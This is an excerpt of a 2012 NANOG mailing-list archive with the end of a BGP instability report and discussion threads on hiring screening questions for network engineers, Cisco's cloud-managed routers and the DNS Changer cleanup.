Observation Point: BGP Peering with AS131072 TOP 20 Unstable Origin AS Rank ASN Upds % Upds/Pfx AS-Name 1 - AS2118 145948 5.2% 113.3 -- RELCOM-AS OOO "NPO Relcom" 2 - AS5800 107625 3.9% 406.1 -- DNIC-ASBLK-05800-06055 - DoD Network Information Center 3 - AS8402 61836 2.2% 33.3 -- CORBINA-AS OJSC "Vimpelcom" 4 - AS9829 50381 1.8% 38.6 -- BSNL-NIB National Internet Backbone 5 - AS27065 37861 1.4% 289.0 -- DNIC-ASBLK-27032-27159 - DoD Network Information Center 6 - AS1502 29933 1.1% 348.1 -- DNIC-ASBLK-01500-01502 - Headquarters, USAISC 7 - AS12479 28588 1.0% 36.4 -- UNI2-AS France Telecom Espana SA 8 - AS24560 27947 1.0% 27.0 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 9 - AS14420 23956 0.9% 43.2 -- CORPORACION NACIONAL DE TELECOMUNICACIONES - CNT EP 10 - AS6713 23007 0.8% 45.6 -- IAM-AS 11 - AS17813 22881 0.8% 168.2 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 12 - AS5803 21563 0.8% 378.3 -- DNIC-ASBLK-05800-06055 - DoD Network Information Center 13 - AS27096 19228 0.7% 1373.4 -- DNIC-ASBLK-27032-27159 - DoD Network Information Center 14 - AS27738 18258 0.7% 33.2 -- Ecuadortelecom S.A. 15 - AS6035 18008 0.7% 375.2 -- DNIC-ASBLK-05800-06055 - DoD Network Information Center 16 - AS28573 17906 0.6% 8.6 -- NET Servicos de Comunicao S.A. 17 - AS13118 17647 0.6% 367.6 -- ASN-YARTELECOM OJSC Rostelecom 18 - AS11664 16311 0.6% 60.6 -- Techtel LMDS Comunicaciones Interactivas S.A. 19 - AS20115 15357 0.6% 9.3 -- CHARTER-NET-HKY-NC - Charter Communications 20 - AS6034 14940 0.5% 383.1 -- DNIC-ASBLK-05800-06055 - DoD Network Information Center TOP 20 Unstable Origin AS (Updates per announced prefix) Rank ASN Upds % Upds/Pfx AS-Name 1 - AS30812 6712 0.2% 3356.0 -- MARSU-AS State Educational Institution of Higher Professional Education Mari State University 2 - AS3 3259 0.1% 1960.0 -- RU-RN-INFORM-NOGLIKI Limited Liability Company "RN-Inform" 3 - AS27096 19228 0.7% 1373.4 -- DNIC-ASBLK-27032-27159 - DoD Network Information Center 4 - AS45734 9312 0.3% 1164.0 -- MAS-AS-ID PT. Media Akses Solusindo 5 - AS16535 2640 0.1% 880.0 -- ECHOS-3 - Echostar Holding Purchasing Corporation 6 - AS42806 873 0.0% 873.0 -- TELECOM-AS Telecom Georgia 7 - AS29126 820 0.0% 820.0 -- DATIQ-AS Datiq B.V. 8 - AS55665 790 0.0% 790.0 -- STMI-AS-ID PT Sampoerna Telemedia Indonesia 9 - AS3 717 0.0% 2225.0 -- RU-RN-INFORM-NOGLIKI Limited Liability Company "RN-Inform" 10 - AS38278 1275 0.1% 637.5 -- VTELECOMNET-MY-AP VTelecoms Berhad - Metro Ethernet LL and Internet Service Provider, Malaysia 11 - AS29644 1832 0.1% 610.7 -- AIRSPEED-AS AirSpeed Communications Ltd. 12 - AS58420 564 0.0% 564.0 -- TNET-DHK-BD M/S T Network, ISP of Bangladesh 13 - AS45286 556 0.0% 556.0 -- EDIINDONESIA-AS-ID PT EDI INDONESIA 14 - AS45905 1999 0.1% 499.8 -- X-LINK-LIMITED-BD 52/1, Hasan Holding, 3rd Floor 15 - AS38030 1422 0.1% 474.0 -- ALAP-AS-BD ALAP COMMUNICATION LTD. DOMESTIC DATA CONNECTIVITY SERVICE & 16 - AS45766 462 0.0% 462.0 -- TRIANGLESERVICES Triangle Services Ltd. 17 - AS28306 14770 0.5% 434.4 -- TC Net Inform?tica e Telecomunica??es LTDA 18 - AS38272 432 0.0% 432.0 -- SONARGAONONLINE-BD-AS-AP Sonargaon Online Services 19 - AS13548 423 0.0% 423.0 -- CHARLESTON-AS - College of Charleston 20 - AS27067 1673 0.1% 418.2 -- DNIC-ASBLK-27032-27159 - DoD Network Information Center TOP 20 Unstable Prefixes Rank Prefix Upds % Origin AS -- AS Name 1 - 109.161.64.0/19 17298 0.6% AS13118 -- ASN-YARTELECOM OJSC Rostelecom 2 - 182.64.0.0/16 10687 0.4% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 3 - 62.36.252.0/22 8222 0.3% AS12479 -- UNI2-AS France Telecom Espana SA 4 - 62.36.249.0/24 6602 0.2% AS12479 -- UNI2-AS France Telecom Espana SA 5 - 122.161.0.0/16 6351 0.2% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 6 - 62.36.241.0/24 6229 0.2% AS12479 -- UNI2-AS France Telecom Espana SA 7 - 202.56.215.0/24 6176 0.2% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 8 - 62.36.210.0/24 6045 0.2% AS12479 -- UNI2-AS France Telecom Espana SA 9 - 59.177.48.0/20 5994 0.2% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 10 - 194.63.9.0/24 5142 0.2% AS1273 -- CW Cable and Wireless Worldwide plc 11 - 69.38.178.0/24 4475 0.1% AS19406 -- TWRS-MA - Towerstream I, Inc. 12 - 62.76.150.0/24 3357 0.1% AS30812 -- MARSU-AS State Educational Institution of Higher Professional Education Mari State University 13 - 62.76.148.0/23 3355 0.1% AS30812 -- MARSU-AS State Educational Institution of Higher Professional Education Mari State University 14 - 59.177.144.0/20 3344 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 15 - 41.43.147.0/24 3341 0.1% AS8452 -- TE-AS TE-AS 16 - 193.235.148.0/22 3259 0.1% AS3 -- RU-RN-INFORM-NOGLIKI Limited Liability Company "RN-Inform" 17 - 59.177.64.0/18 3139 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 18 - 220.196.26.0/24 2822 0.1% AS17621 -- CNCGROUP-SH China Unicom Shanghai network 19 - 152.121.181.0/24 2766 0.1% AS27030 -- USCG-AS - United States Coast Guard 20 - 67.47.194.0/23 2637 0.1% AS16535 -- ECHOS-3 - Echostar Holding Purchasing Corporation Details at http://bgpupdates.potaroo.net ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From jlewis at lewis.org Fri Jul 6 23:00:32 2012 From: jlewis at lewis.org (Jon Lewis) Date: Sat, 7 Jul 2012 00:00:32 -0400 (EDT) Subject: job screening question In-Reply-To: References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: On Fri, 6 Jul 2012, George Herbert wrote: > If people don't bother to clean up the resume, either they don't > understand what's relevant now, or they don't care, or they're trying > to hide something. Or they want to show they've been doing it long enough that they have experience working with older gear younger people may not have even heard of. I have experience with Portmasters, Pipelines, and home built Linux multiport dialup PPP servers. None are relevant today. IMO, at least the latter demonstrates some skills. Rolling your own 80-port dialup server in 1995 wasn't just "yum install dialup-server" :) I don't mention Portmasters or Pipelines on my resume, but I do have Livingston and Ascend in the list of [many obsolete] router brands I have experience with. Is that really totally irrelevant now? ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From dedelman at iname.com Fri Jul 6 23:01:51 2012 From: dedelman at iname.com (David Edelman) Date: Sat, 07 Jul 2012 04:01:51 +0000 Subject: job screening question In-Reply-To: Message-ID: On 7/7/12 1:24 AM, "Jared Mauch" wrote: >Die proxy arp die. (and that's not German). > >I've had a job or consulting gig or two that has inadvertently had this >as the hidden glue making things work. > >(wha, you can't route that subnet out an Ethernet interface without a >next hop? It's always worked....) > >I fight with sysadmins to this day about the concept of a broadcast >domain and subnet... If I hear another case of someone saying that switch >is the "80" subnet when there are 3 co-existing /24s in that domain I may >go crazy.... > >I've cleaned up a lot of poor host and network management and it's >amazing how much a difference the hardware operates without the hacks. > >Jared Mauch > >On Jul 6, 2012, at 8:51 PM, Ben Aitchison wrote: > >> Routing loops, incorrect >> subnet masks. (like when people stick a /24 netmask on a /27 then >>can't reach another >> adjacent /27) > >We had a pair of diversely located systems operate for about 18 months >with misconfigured gateway addresses. Proxy ARP kept everything on an >even keel until one of the systems failed and the traffic routed to the >remaining system. I arrived on the call in time to hear the sys admins >saying that they had exceeded the maximum number of ARP entries and were >going to expand the table :( From mpalmer at hezmatt.org Fri Jul 6 23:06:58 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Sat, 7 Jul 2012 14:06:58 +1000 Subject: job screening question In-Reply-To: <20120707005155.GA14111@meh.net.nz> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> Message-ID: <20120707040658.GC2221@hezmatt.org> On Sat, Jul 07, 2012 at 12:51:55PM +1200, Ben Aitchison wrote: > On Fri, Jul 06, 2012 at 04:18:21PM +1000, Matthew Palmer wrote: > > On Thu, Jul 05, 2012 at 05:01:39PM -0700, Scott Weeks wrote: > > > --- jason at thebaughers.com wrote: > > > From: Jason Baugher > > > > > > Geez, I'd be happy to find someone with a good attitude, a solid work > > > ethic, and the desire and aptitude to learn. :) > > > --------------------------------------- > > > > > > > > > Yeah, that. But how do you get those folks through the HR > > > process to you, so you can decipher their skill/work ethic > > > level? What can the HR person ask to find out if someone > > > has these qualities? OSPF LSA type questions will not help. > > > > Don't get HR to do that sort of screening. They suck mightily at it. I > > lack any sort of HR department to get in the way, and I'm glad of it -- I > > don't see the value in having someone who doesn't know anything about the > > job get in the way of finding the right person for it. Sure, get 'em to do > > the scutwork of posting job ads, collating resumes, scheduling things and > > sending the "lolz no!" responses, but actually filtering? Nah, I'll do that > > bit thanks. If you have to have HR do a filter call, make it *really* > > simple, like "What does TCP stand for?" -- sadly, you'll still probably > > filter out half the applicants for a senior position... > > I've noticed a strong correlation between people who don't know what acronyms > stand for, and competence. People who don't know anything try and figure out > what the acronym stands for - people who want to understand things see it as > just a place holder. [...] > Maybe it's more significant to ask what the difference between TCP and UDP is. Yes, the difference between TCP and UDP is a much better question to ask, but having HR assess and act on the answer to the question is a whole hell of a lot harder. In many ways, *that's* the tough bit of finding a good screening question. Finding good interview questions *in general* isn't all that hard. With a good senior candidate my interview questions could just be bringing up problems I've recently solved or am currently wrestling with, and having a 30 minute conversation on the problem. I'll get a very good idea of someone's domain knowledge and problem-solving skills by doing that. But there's no way I can ask HR to do that, because they don't know how to assess the answer, and as previously demonstrated ("fragmented disks", indeed), you can't have HR act as scribe and relay the answer to you, because they'll get it wrong, and the interesting bit is the *conversation*, not the canned single-shot answer. That's my motivation for asking a question as inane as "What does TCP stand for?" -- it has an overwhelmingly obvious answer that can be verified in a second or two by someone who really doesn't know anything about what they're asking. Give a candidate 10 of those sorts of questions over the phone from an HR drone, if they score 8-or-better (for instance) they pass and you get to see their resume. That is, of course, assuming your organisation is so screwed up that they won't let you at candidates directly (which is still my preferred option -- leave HR to do the paperwork). - Matt -- The real art of conversation is not only to say the right thing at the right place but to leave unsaid the wrong thing at the tempting moment. -- Dorothy Nevill From owen at delong.com Fri Jul 6 23:20:03 2012 From: owen at delong.com (Owen DeLong) Date: Fri, 6 Jul 2012 21:20:03 -0700 Subject: job screening question In-Reply-To: <20120707040658.GC2221@hezmatt.org> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> Message-ID: <33C1956D-77FD-48A2-B493-1597438AE68A@delong.com> On Jul 6, 2012, at 9:06 PM, Matthew Palmer wrote: > On Sat, Jul 07, 2012 at 12:51:55PM +1200, Ben Aitchison wrote: >> On Fri, Jul 06, 2012 at 04:18:21PM +1000, Matthew Palmer wrote: >>> On Thu, Jul 05, 2012 at 05:01:39PM -0700, Scott Weeks wrote: >>>> --- jason at thebaughers.com wrote: >>>> From: Jason Baugher >>>> >>>> Geez, I'd be happy to find someone with a good attitude, a solid work >>>> ethic, and the desire and aptitude to learn. :) >>>> --------------------------------------- >>>> >>>> >>>> Yeah, that. But how do you get those folks through the HR >>>> process to you, so you can decipher their skill/work ethic >>>> level? What can the HR person ask to find out if someone >>>> has these qualities? OSPF LSA type questions will not help. >>> >>> Don't get HR to do that sort of screening. They suck mightily at it. I >>> lack any sort of HR department to get in the way, and I'm glad of it -- I >>> don't see the value in having someone who doesn't know anything about the >>> job get in the way of finding the right person for it. Sure, get 'em to do >>> the scutwork of posting job ads, collating resumes, scheduling things and >>> sending the "lolz no!" responses, but actually filtering? Nah, I'll do that >>> bit thanks. If you have to have HR do a filter call, make it *really* >>> simple, like "What does TCP stand for?" -- sadly, you'll still probably >>> filter out half the applicants for a senior position... >> >> I've noticed a strong correlation between people who don't know what acronyms >> stand for, and competence. People who don't know anything try and figure out >> what the acronym stands for - people who want to understand things see it as >> just a place holder. > > [...] > >> Maybe it's more significant to ask what the difference between TCP and UDP is. > > Yes, the difference between TCP and UDP is a much better question to ask, > but having HR assess and act on the answer to the question is a whole hell > of a lot harder. In many ways, *that's* the tough bit of finding a good > screening question. Finding good interview questions *in general* isn't all > that hard. With a good senior candidate my interview questions could just > be bringing up problems I've recently solved or am currently wrestling with, > and having a 30 minute conversation on the problem. I'll get a very good > idea of someone's domain knowledge and problem-solving skills by doing that. > But there's no way I can ask HR to do that, because they don't know how to > assess the answer, and as previously demonstrated ("fragmented disks", > indeed), you can't have HR act as scribe and relay the answer to you, > because they'll get it wrong, and the interesting bit is the *conversation*, > not the canned single-shot answer. Not so much, if you ask it in a slightly different way.... "If it isn't important that you get absolutely every packet, but it is vital that your packets be delivered without delay, would you prefer to use TCP or UDP?" HR can ask that. HR can easily evaluate the answer... TCP: Wrong, UDP: Right. Other interesting selections: Please choose either TCP or UDP (with a note to the potential interviewer that this person may be very creative, very smart or may simply have difficulty following directions) Spending a little time crafting the questions can pay tremendous dividends. > That's my motivation for asking a question as inane as "What does TCP stand > for?" -- it has an overwhelmingly obvious answer that can be verified in a > second or two by someone who really doesn't know anything about what they're > asking. Give a candidate 10 of those sorts of questions over the phone from > an HR drone, if they score 8-or-better (for instance) they pass and you get > to see their resume. That is, of course, assuming your organisation is so > screwed up that they won't let you at candidates directly (which is still my > preferred option -- leave HR to do the paperwork). I think there are better questions and ways to ask them that work even for HR than acronym memorization. I say this as one who could both correctly configure a router _AND_ probably score nearly 100% on the acronym test. Owen From sparctacus at gmail.com Fri Jul 6 23:25:55 2012 From: sparctacus at gmail.com (Bryan Irvine) Date: Fri, 6 Jul 2012 21:25:55 -0700 Subject: job screening question In-Reply-To: <20120707040658.GC2221@hezmatt.org> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> Message-ID: <20120707042555.GA2272@hackbook.bozilla.net> On Sat, Jul 07, 2012 at 02:06:58PM +1000, Matthew Palmer wrote: > On Sat, Jul 07, 2012 at 12:51:55PM +1200, Ben Aitchison wrote: > > On Fri, Jul 06, 2012 at 04:18:21PM +1000, Matthew Palmer wrote: > > > On Thu, Jul 05, 2012 at 05:01:39PM -0700, Scott Weeks wrote: > > > > --- jason at thebaughers.com wrote: > > > > From: Jason Baugher > > > > > > > > Geez, I'd be happy to find someone with a good attitude, a solid work > > > > ethic, and the desire and aptitude to learn. :) > > > > --------------------------------------- > > > > > > > > > > > > Yeah, that. But how do you get those folks through the HR > > > > process to you, so you can decipher their skill/work ethic > > > > level? What can the HR person ask to find out if someone > > > > has these qualities? OSPF LSA type questions will not help. > > > > > > Don't get HR to do that sort of screening. They suck mightily at it. I > > > lack any sort of HR department to get in the way, and I'm glad of it -- I > > > don't see the value in having someone who doesn't know anything about the > > > job get in the way of finding the right person for it. Sure, get 'em to do > > > the scutwork of posting job ads, collating resumes, scheduling things and > > > sending the "lolz no!" responses, but actually filtering? Nah, I'll do that > > > bit thanks. If you have to have HR do a filter call, make it *really* > > > simple, like "What does TCP stand for?" -- sadly, you'll still probably > > > filter out half the applicants for a senior position... > > > > I've noticed a strong correlation between people who don't know what acronyms > > stand for, and competence. People who don't know anything try and figure out > > what the acronym stands for - people who want to understand things see it as > > just a place holder. > > [...] > > > Maybe it's more significant to ask what the difference between TCP and UDP is. > > Yes, the difference between TCP and UDP is a much better question to ask, > but having HR assess and act on the answer to the question is a whole hell > of a lot harder. In many ways, *that's* the tough bit of finding a good > screening question. Indeed. I was once filtered out of a sysadmin job at a big search engine company. They asked questions like: What system call does the ls command make? I didn't know, but said you could read the source or strace to find out. They asked me to describe what ARP is. I basically talked about what an ARP table is and went into detail about "who-has" requests for building the table etc... and more questions like that. They seemed lost and didn't seem to know what I was talking about. It was at this point I realized that I was talking to an HR screener. The conversation was awkward from this point on as I struggled to attempt to guess what might be on the piece of paper as "The Right Answer". Needless to say I didn't hear back. Was I what they were looking for? Maybe, maybe not. But I was screened out before either of us could find out. Just as well, I'm much happier where I am now. :-) > Finding good interview questions *in general* isn't all > that hard. With a good senior candidate my interview questions could just > be bringing up problems I've recently solved or am currently wrestling with, > and having a 30 minute conversation on the problem. I'll get a very good > idea of someone's domain knowledge and problem-solving skills by doing that. > But there's no way I can ask HR to do that, because they don't know how to > assess the answer, and as previously demonstrated ("fragmented disks", > indeed), you can't have HR act as scribe and relay the answer to you, > because they'll get it wrong, and the interesting bit is the *conversation*, > not the canned single-shot answer. Definitely. I like the describe difference between UDP/TCP question. Another fave of mine is "Give me a list of various acronyms and its associated port" and give them HTTP/80 as an example. Many interviews end shortly after this one. > That's my motivation for asking a question as inane as "What does TCP stand > for?" -- it has an overwhelmingly obvious answer that can be verified in a > second or two by someone who really doesn't know anything about what they're > asking. Give a candidate 10 of those sorts of questions over the phone from > an HR drone, if they score 8-or-better (for instance) they pass and you get > to see their resume. That is, of course, assuming your organisation is so > screwed up that they won't let you at candidates directly (which is still my > preferred option -- leave HR to do the paperwork). +1 From jgreco at ns.sol.net Sat Jul 7 09:30:13 2012 From: jgreco at ns.sol.net (Joe Greco) Date: Sat, 7 Jul 2012 09:30:13 -0500 (CDT) Subject: Cisco Update In-Reply-To: Message-ID: <201207071430.q67EUDjx019523@aurora.sol.net> > On 7/5/12, Joe Greco wrote: > > It'll get real interesting when Cisco's cloud database is breached and > > some weakness in the password encryption is discovered. > [snip] > > Will the users' passwords even matter, if a compromise of the > database allows an intruder to make a system-wide change to end users' > equipment, such as delivering a compromising configuration change, or > a "patched" firmware update that deactivates cloud service and > turns them all into botnet nodes under exclusive control of the > compromiser ? > > Hopefully Cisco thought that stuff out, but password encryption > weaknesses at least are easily addressed by forcing all users to reset > pw, and requiring a proof of physical access to the unit. "and requiring a proof of physical access to the unit"? Yeah, sure, that seems likely. No, really, how bad an idea can it be to have a central database and a system that's allowed to remotely log in, configure, and update thousands of Internet-connected CPE? I mean, talk about making an attractive target. Compromise this one system and gain access to create a huge botnet. Complete list of CPE addresses and access credentials in one juicy bundle. How is it that NANOG can see this with no trouble but Cisco cannot? What's stunningly clear is that Cisco did NOT think that stuff out. You want content filtering? Boring. Been done for years, without "cloud" features. You want remote management? Boring. Been done for years, just look at DD-WRT et.al. You want configuration backup and restore? Still boring. Could have figured a slick method to do THAT "to the cloud", as an option, with per-account encryption, or config backup to local PC, or both. Automatic firmware updates? Hey, effin' great! I heartily approve of THAT idea, even of defaulting it to on. Just make sure I can also turn it off. "Forced" upgrades are not acceptable. Requiring an upgrade to happen over the public Internet is not acceptable. Make sure we have the option to upgrade manually from a local firmware file. So is a user locked out of administering the router unless it can talk to the cloud? If so, that's boneheaded in the extreme. Hey, Cisco, when my DSL with static IP finally dies and I need to switch to a provider that uses DHCP, how am I supposed to log in to my router since it can not connect to your glorious cloud? And the onerous puritanical TOS? Find and fire whoever came up with that. That's just a complete load. Did you sign an agreement not to watch porno DVD's when you bought your DVD player? It's *equipment*, Cisco. Some people will invariably use it for purposes you find to be objectionable. Geez. ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples. From jra at baylink.com Sat Jul 7 12:31:24 2012 From: jra at baylink.com (Jay Ashworth) Date: Sat, 7 Jul 2012 13:31:24 -0400 (EDT) Subject: DNS Changer items In-Reply-To: <4FF7251A.2040003@rollernet.us> Message-ID: <8418792.13134.1341682284168.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Seth Mattinen" > > On Fri, 06 Jul 2012 13:20:55 -0400, Andrew Fried said: > >> The dns-ok.us site is getting crushed from all the sudden media > >> interest. > > > > One wonders why it's so hard to get the media interested when it > > would be *helpful*. DNS Changer gets traction like 3 days before the > > drop dead date, IPv6 gets on the radar *after* we run out of v4 /8's > > to give to regionals, etc... > > Reactive is easier to justify to the powers that be than proactive. It's easier to justify *not* being smart enough to deal with the problem when it doesn't cause a major disruption? Have we venerated stupidity *that deeply* in the US? Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From jcdill.lists at gmail.com Sat Jul 7 13:01:29 2012 From: jcdill.lists at gmail.com (JC Dill) Date: Sat, 07 Jul 2012 11:01:29 -0700 Subject: job screening question In-Reply-To: <20120707040658.GC2221@hezmatt.org> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> Message-ID: <4FF87979.3010308@gmail.com> On 06/07/12 9:06 PM, Matthew Palmer wrote: >> Maybe it's more significant to ask what the difference between TCP and UDP is. > Yes, the difference between TCP and UDP is a much better question to ask, > but having HR assess and act on the answer to the question is a whole hell > of a lot harder. The best path is to have HR report the answer verbatim for the hiring manager to do the assessing. Then the hiring manager can decide which candidates proceed to the next level of interviews. jc From mpalmer at hezmatt.org Sat Jul 7 13:13:19 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Sun, 8 Jul 2012 04:13:19 +1000 Subject: job screening question In-Reply-To: <4FF87979.3010308@gmail.com> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> Message-ID: <20120707181318.GF2221@hezmatt.org> On Sat, Jul 07, 2012 at 11:01:29AM -0700, JC Dill wrote: > On 06/07/12 9:06 PM, Matthew Palmer wrote: > >>Maybe it's more significant to ask what the difference between TCP and UDP is. > >Yes, the difference between TCP and UDP is a much better question to ask, > >but having HR assess and act on the answer to the question is a whole hell > >of a lot harder. > > The best path is to have HR report the answer verbatim for the > hiring manager to do the assessing. Then the hiring manager can > decide which candidates proceed to the next level of interviews. Two problems there: * We've already had mention made in this thread of the problems associated with HR attempting to record, verbatim, an answer provided by a candidate. Unless all your HR phone screeners are experienced stenographers (who, I will note, can typically command salaries far in excess of HR associates), their chances of getting an accurate record of a candidate's statements is slim. * If you're going to have to carefully examine each candidate's answers *anyway*, why not just get on the phone screen with them in the first place, and get HR out of the picture? At least that way you're not wasting money paying for HR people, and you can do a far more in-depth interview because you're there, in real-time, to ask follow-up questions. - Matt -- MySQL seems to be the Windows of the database world. Broken, underspecced, and mainly only popular due to inertia and people who don't really know what they're doing. -- Peter Corlett, in the Monastery From george.herbert at gmail.com Sat Jul 7 13:30:25 2012 From: george.herbert at gmail.com (George Herbert) Date: Sat, 7 Jul 2012 11:30:25 -0700 Subject: job screening question In-Reply-To: <20120707181318.GF2221@hezmatt.org> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org> Message-ID: <31F1F3F6-EC50-4931-90F0-D90FE8D512CB@gmail.com> On Jul 7, 2012, at 11:13 AM, Matthew Palmer wrote: > On Sat, Jul 07, 2012 at 11:01:29AM -0700, JC Dill wrote: >> On 06/07/12 9:06 PM, Matthew Palmer wrote: >>>> Maybe it's more significant to ask what the difference between TCP and UDP is. >>> Yes, the difference between TCP and UDP is a much better question to ask, >>> but having HR assess and act on the answer to the question is a whole hell >>> of a lot harder. >> >> The best path is to have HR report the answer verbatim for the >> hiring manager to do the assessing. Then the hiring manager can >> decide which candidates proceed to the next level of interviews. > > Two problems there: > > * We've already had mention made in this thread of the problems associated > with HR attempting to record, verbatim, an answer provided by a candidate. > Unless all your HR phone screeners are experienced stenographers (who, I > will note, can typically command salaries far in excess of HR associates), > their chances of getting an accurate record of a candidate's statements is > slim. > > * If you're going to have to carefully examine each candidate's answers > *anyway*, why not just get on the phone screen with them in the first > place, and get HR out of the picture? At least that way you're not > wasting money paying for HR people, and you can do a far more in-depth > interview because you're there, in real-time, to ask follow-up questions. > > - Matt Yeah. We tried "write down verbatim" - epic fail. This was why we spent man-months of top level consultant time coming up with ( and fixing and evolving ) lists of twentyish questions per discipline with only one right answer and an answer the recruiter could tell was right or not. It's not easy. If you screen a thousand plus people a year it's a super win. If you screen ten or twenty you may just want your techie interviewer to do the short screen rather than figure out how the recruiter can. George William Herbert Sent from my iPhone From bill at herrin.us Sat Jul 7 13:33:10 2012 From: bill at herrin.us (William Herrin) Date: Sat, 7 Jul 2012 14:33:10 -0400 Subject: job screening question In-Reply-To: <20120707181318.GF2221@hezmatt.org> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org> Message-ID: On Sat, Jul 7, 2012 at 2:13 PM, Matthew Palmer wrote: > * If you're going to have to carefully examine each candidate's answers > *anyway*, why not just get on the phone screen with them in the first > place, and get HR out of the picture? At least that way you're not > wasting money paying for HR people, and you can do a far more in-depth > interview because you're there, in real-time, to ask follow-up questions. I don't know about you but my brain doesn't switch on a dime. I have to *prepare* to conduct a phone interview. And afterward I have to spool back up on whatever task I was working on. If a screening question can cut many candidates who I'll know in 5 minutes aren't the one, that saves me a lot more time than just the 5 minutes on the phone. Plus, frankly, I don't enjoy conducting interviews. It's necessary but I find it stressful. Where I can avoid it with minimal risk of missing the individual I actually want to hire, that makes me happy. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From mysidia at gmail.com Sat Jul 7 17:58:26 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Sat, 7 Jul 2012 17:58:26 -0500 Subject: job screening question In-Reply-To: <20120707181318.GF2221@hezmatt.org> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org> Message-ID: On 7/7/12, Matthew Palmer wrote: > * We've already had mention made in this thread of the problems associated > with HR attempting to record, verbatim, an answer provided by a candidate. [snip] Conversation should be recorded, then they don't have to write out the full text :) Asking a HR agent to vet a candidate's technical credentials, beyond verification of identity/history/certs, is like asking a blind person to administer a vision test. Possibly it can be done, but only within a very rigid framework requiring very little flexibility or knowledge from the test administrator. The HR agent should make it clear that the question is a screening question, to be answered as-is to their ability, and a short easily-recordable answer is expected. The ideal screening question should be either presented as multiple choice, or a question where a one word or one-sentence answer is expected. That can be written down very easily, and correctness/incorrectness should be obvious. Instead of asking for a definition of TCP, provide the definition, and ask for the one word or one number answer. "When a number received in an IP packet is presented in network byte order, and the host architecture is big endian, what must be done to convert the number into host byte order?" (one word answer) "What commonly used protocol uses IP datagrams to provide a reliable transport?" (one word answer) "What IP protocol number has IANA assigned protocol number 1 to?" (one word answer) "The TCP/UDP port numbers below what number are considered well-known, and can only be bound by administrative users?" (one number answer) "What version of the IP datagram protocol is most widely deployed?" (one number answer) "How many bits are there in an IPv4 address?" (one two-digit number answer) "Host bits in an IPv4 address correspond to the bits in the network mask set to what value?" (one single-digit number answer) "Is 192.168.0.256 a valid ip address for a host on a private intranet?" (one yes/no answer) "Is 172.16.12.3 ?" (one yes/no answer) "What's the problem with using 255.255.255.247 as a subnet mask if you want to make a LAN subnet with 12 hosts?" (5 word answer) "What TCP header flag should be set on the first packet sent by a connection initiator as part of a 3-way handshake?" (one word answer) "What TCP destination port numbers should be allowed through the perimeter stateful firewall device to and from a mail server whose only purpose is to proxy SMTP mail from internal sources?" (one number answer) .... -- -JH From cb.list6 at gmail.com Sat Jul 7 19:10:59 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Sat, 7 Jul 2012 17:10:59 -0700 Subject: Running your own DNSchanger proxies Message-ID: On the other thread i read that some ISP are running their own proxies for infected host. That sounded interesting, so i googled around to find out how to do that and i could not find a HOWTO, so imagined up a solution myself, tested it in VirtualBox, and wrote it down in case anyone finds it useful or has another approach https://sites.google.com/site/cbyrne/dnschanger I don't plan to use this solution, but it was interesting to think about and may be a good starting point in the unlikely event that some VP pushes the panic button on Monday. CB From kmedcalf at dessus.com Sat Jul 7 19:44:11 2012 From: 